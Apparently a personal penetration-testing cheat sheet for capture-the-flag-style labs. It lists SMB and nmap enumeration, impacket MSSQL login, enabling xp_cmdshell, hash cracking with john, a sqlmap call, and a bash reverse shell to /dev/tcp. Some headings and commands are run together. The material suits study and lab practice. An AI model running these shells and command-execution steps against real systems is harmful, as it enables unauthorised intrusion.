Resources
Tools
SMB
Server Message Blocks (Port 445) (aka Common Internet File System).
To enumerate:
smbclient -N -L \\\\{TARGET_IP}\\
-N: no password
-L: look at what services are availableTo access:
smbclient -N \\\\{TARGET_IP}\\<folder>When inside, dir prints the directories.
To download a file: get.
NMAP
nmap -p- --min-rate 5000 -sV {TARGET_IP}
nmap -sC -sV {TARGET_IP}Impacket
Can be used to connect and authenticate to a MSSQL server for example.
We can try to connect to the MSSQL server by using impacket’s mssqlclient.py script along with the
following flags:
python3 mssqlclient.py ARCHETYPE/sql_svc@{TARGET_IP} -windows-auth
-windows-auth : this flag is specified to use Windows Authentication Check if I am admin inside MSSQL:
SELECT is_srvrolemember('sysadmin');To check for xp_cmdshell:
EXEC xp_cmdshell 'net user';To activate xp_cmdshell:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
sp_configure; - Enabling the sp_configure as stated in the above error message
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;We can also use the powershell like this:
xp_cmdshell "powershell -c pwd"Navigation:
xp_cmdshell "powershell -c cd C:/Users/Public; dir"More on MSSQL Pentesting:
- Pentesting MSSQL (HackTricks)
- MSSQL Injection CheatSheet
BURP
Burp Suite is a powerful security testing application that can be used to perform web requests on web applications, mobile apps, and thick clients. Burp offers multiple capabilities such as web crawler, scanner, proxy, repeater, intruder and many more.
A web crawler (also known as a web spider or web robot) is a program or automated script which browses the World Wide Web in a methodical, automated manner. This process
is called Web crawling or spidering. Many legitimate sites, in particular search engines, use spidering as a means of providing up-to-date data.
If you tunnel web traffic through Burp Suite (without intercepting the packets), by default it can passively spider the website, update the site map with all of the contents requested and thus creating a tree of files and directories without sending any further requests.
Stable Reverse Shell
sudo python3 -m http.server 80sudo nc -lvnp 443- Functional php reverse shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'SUID
Commonly noted as SUID (Set owner User ID), the special permission for the user access level has a single function: A file with SUID always executes as the user who owns the file, regardless of the user passing the command. If the file owner doesn’t have execute permissions, then use an uppercase S here.
Useful Commands
cat * | grep -i passw*Crack a ZIP file
Turn into hash:
zip2john backup.zip > hashesjohn -wordlist=/usr/share/wordlists/rockyou.txt hashesSQLmap
SQLmap is an open-source tool used in penetration testing to detect and exploit SQL injection flaws. SQLmap automates the process of detecting and exploiting SQL injection. SQL Injection attacks can take control of databases that utilise SQL.
- Command:
sqlmap -u 'http://10.129.95.174/dashboard.php?search=any+query' --
cookie="PHPSESSID=7u6p9qbhb44c5c1rsefp4ro8u1"- Good shell:
bash -c "bash -i >& /dev/tcp/{your_IP}/443 0>&1"